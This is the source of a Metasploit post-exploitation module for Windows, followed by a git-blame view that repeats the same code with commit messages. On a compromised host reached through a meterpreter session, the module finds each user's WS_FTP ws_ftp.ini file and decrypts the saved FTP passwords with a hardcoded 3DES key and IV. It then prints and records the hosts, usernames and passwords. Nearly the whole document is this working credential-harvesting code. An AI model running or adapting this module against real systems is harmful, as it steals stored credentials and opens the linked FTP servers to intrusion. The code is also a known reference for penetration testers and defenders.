metasploit-framework/modules/post/windows/gather/wsftp_client_creds.rb

# $Id$

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex'
require 'rex/parser/ini'
require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Post
	include Msf::Post::Windows::Registry
	include Msf::Auxiliary::Report

	def initialize(info={})
		super( update_info( info,
				'Name'          => 'Windows Gather WS_FTP Saved Password Extraction',
				'Description'   => %q{ This module extracts weakly encrypted saved FTP Passwords 
					from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file. },
				'License'       => MSF_LICENSE,
				'Author'        => [ 'TheLightCosine <thelightcosine[at]gmail.com>'],
				'Version'       => '$Revision$',
				'Platform'      => [ 'windows' ],
				'SessionTypes'  => [ 'meterpreter' ]
			))
	end

	def run
		print_status("Checking Default Locations...")
		os = session.sys.config.sysinfo['OS']
		drive = session.fs.file.expand_path("%SystemDrive%")

		if os =~ /Windows 7|Vista|2008/
			@appdata = '\\AppData\\Roaming\\'
			@users = drive + '\\Users'
		else
			@appdata = '\\Application Data\\'
			@users = drive + '\\Documents and Settings'
		end

		get_users
		@userpaths.each do |path|
			check_appdata(path)
		end
	end

	def check_appdata(path)
		filename = "#{path}#{@appdata}\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini"
		begin
			iniexists = client.fs.file.stat(filename)
			print_status("Found File at #{filename}")
			get_ini(filename)
		rescue
			print_status("#{filename} not found ....")
		end
	end

	def get_users
		@userpaths = []
		session.fs.dir.foreach(@users) do |path|
			next if path =~ /^(\.|\.\.|All Users|Default|Default User|Public|desktop.ini|LocalService|NetworkService)$/
			@userpaths << "#{@users}\\#{path}\\"
		end
	end

	def get_ini(filename)
		config = client.fs.file.new(filename, 'r')
		parse = config.read
		ini = Rex::Parser::Ini.from_s(parse)

		ini.each_key do |group|
			next if group == "_config_"
			print_status("Processing Saved Session #{group}")
			host = ini[group]['HOST']
			host = host.delete "\""
			username = ini[group]['UID']
			username = username.delete "\""
			port = 	ini[group]['PORT']
			passwd = ini[group]['PWD']
			passwd = decrypt(passwd)

			next if passwd == nil or passwd == ""
			port = 21 if port == nil
			print_good("Host: #{host} Port: #{port} User: #{username}  Password: #{passwd}")
			report_auth_info(
						:host  => host,
						:port => port,
						:sname => 'FTP',
						:user => username,
						:pass => passwd)
		end
	end

	def decrypt(pwd)
		decoded = pwd.unpack("m*")[0]
		key = "\xE1\xF0\xC3\xD2\xA5\xB4\x87\x96\x69\x78\x4B\x5A\x2D\x3C\x0F\x1E\x34\x12\x78\x56\xab\x90\xef\xcd"
		iv = "\x34\x12\x78\x56\xab\x90\xef\xcd"
		des = OpenSSL::Cipher::Cipher.new("des-ede3-cbc")

		des.decrypt
		des.key = key
		des.iv = iv
		result = des.update(decoded)
		final = result.split("\000")[0]
		return final
	end
end
Added WS_FTP Client password gather post module, thanks thelightcosine! git-svn-id: file:///home/svn/framework3/trunk@12867 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-06 16:53:14 +00:00			`# $Id$`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`
			`require 'rex'`
			`require 'rex/parser/ini'`
Change Post Mixin for Windows platform in its own separate class and minor fixes on modules and scripts git-svn-id: file:///home/svn/framework3/trunk@12990 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 00:38:04 +00:00			`require 'msf/core/post/windows/registry'`
Added WS_FTP Client password gather post module, thanks thelightcosine! git-svn-id: file:///home/svn/framework3/trunk@12867 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-06 16:53:14 +00:00
			`class Metasploit3 < Msf::Post`
Change Post Mixin for Windows platform in its own separate class and minor fixes on modules and scripts git-svn-id: file:///home/svn/framework3/trunk@12990 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-21 00:38:04 +00:00			`include Msf::Post::Windows::Registry`
Added WS_FTP Client password gather post module, thanks thelightcosine! git-svn-id: file:///home/svn/framework3/trunk@12867 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-06 16:53:14 +00:00			`include Msf::Auxiliary::Report`

			`def initialize(info={})`
			`super( update_info( info,`
			`'Name' => 'Windows Gather WS_FTP Saved Password Extraction',`
			`'Description' => %q{ This module extracts weakly encrypted saved FTP Passwords`
Description clean up and a tiny bit of whitespace changes. Also changed one use of eql?() to == since that's nearly always better, says me. git-svn-id: file:///home/svn/framework3/trunk@13357 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-27 02:39:49 +00:00			`from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file. },`
Added WS_FTP Client password gather post module, thanks thelightcosine! git-svn-id: file:///home/svn/framework3/trunk@12867 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-06 16:53:14 +00:00			`'License' => MSF_LICENSE,`
Exercising my author e-mail format dictatorship for some of the win gather post mods git-svn-id: file:///home/svn/framework3/trunk@13296 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-22 20:09:26 +00:00			`'Author' => [ 'TheLightCosine <thelightcosine[at]gmail.com>'],`
Added WS_FTP Client password gather post module, thanks thelightcosine! git-svn-id: file:///home/svn/framework3/trunk@12867 4d416f70-5f16-0410-b530-b9f4589650da 2011-06-06 16:53:14 +00:00			`'Version' => '$Revision$',`
			`'Platform' => [ 'windows' ],`
			`'SessionTypes' => [ 'meterpreter' ]`
			`))`
			`end`

			`def run`
			`print_status("Checking Default Locations...")`
			`os = session.sys.config.sysinfo['OS']`
			`drive = session.fs.file.expand_path("%SystemDrive%")`

			`if os =~ /Windows 7\|Vista\|2008/`
			`@appdata = '\\AppData\\Roaming\\'`
			`@users = drive + '\\Users'`
			`else`
			`@appdata = '\\Application Data\\'`
			`@users = drive + '\\Documents and Settings'`
			`end`

			`get_users`
			`@userpaths.each do \|path\|`
			`check_appdata(path)`
			`end`
			`end`

			`def check_appdata(path)`
			`filename = "#{path}#{@appdata}\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini"`
			`begin`
			`iniexists = client.fs.file.stat(filename)`
			`print_status("Found File at #{filename}")`
			`get_ini(filename)`
			`rescue`
			`print_status("#{filename} not found ....")`
			`end`
			`end`

			`def get_users`
			`@userpaths = []`
			`session.fs.dir.foreach(@users) do \|path\|`
			`next if path =~ /^(\.\|\.\.\|All Users\|Default\|Default User\|Public\|desktop.ini\|LocalService\|NetworkService)$/`
			`@userpaths << "#{@users}\\#{path}\\"`
			`end`
			`end`

			`def get_ini(filename)`
			`config = client.fs.file.new(filename, 'r')`
			`parse = config.read`
			`ini = Rex::Parser::Ini.from_s(parse)`

			`ini.each_key do \|group\|`
			`next if group == "_config_"`
			`print_status("Processing Saved Session #{group}")`
			`host = ini[group]['HOST']`
			`host = host.delete "\""`
			`username = ini[group]['UID']`
			`username = username.delete "\""`
			`port = ini[group]['PORT']`
			`passwd = ini[group]['PWD']`
			`passwd = decrypt(passwd)`

			`next if passwd == nil or passwd == ""`
			`port = 21 if port == nil`
			`print_good("Host: #{host} Port: #{port} User: #{username} Password: #{passwd}")`
			`report_auth_info(`
			`:host => host,`
			`:port => port,`
			`:sname => 'FTP',`
			`:user => username,`
			`:pass => passwd)`
			`end`
			`end`

			`def decrypt(pwd)`
			`decoded = pwd.unpack("m*")[0]`
			`key = "\xE1\xF0\xC3\xD2\xA5\xB4\x87\x96\x69\x78\x4B\x5A\x2D\x3C\x0F\x1E\x34\x12\x78\x56\xab\x90\xef\xcd"`
			`iv = "\x34\x12\x78\x56\xab\x90\xef\xcd"`
			`des = OpenSSL::Cipher::Cipher.new("des-ede3-cbc")`

			`des.decrypt`
			`des.key = key`
			`des.iv = iv`
			`result = des.update(decoded)`
			`final = result.split("\000")[0]`
			`return final`
			`end`
Exercising my author e-mail format dictatorship for some of the win gather post mods git-svn-id: file:///home/svn/framework3/trunk@13296 4d416f70-5f16-0410-b530-b9f4589650da 2011-07-22 20:09:26 +00:00			`end`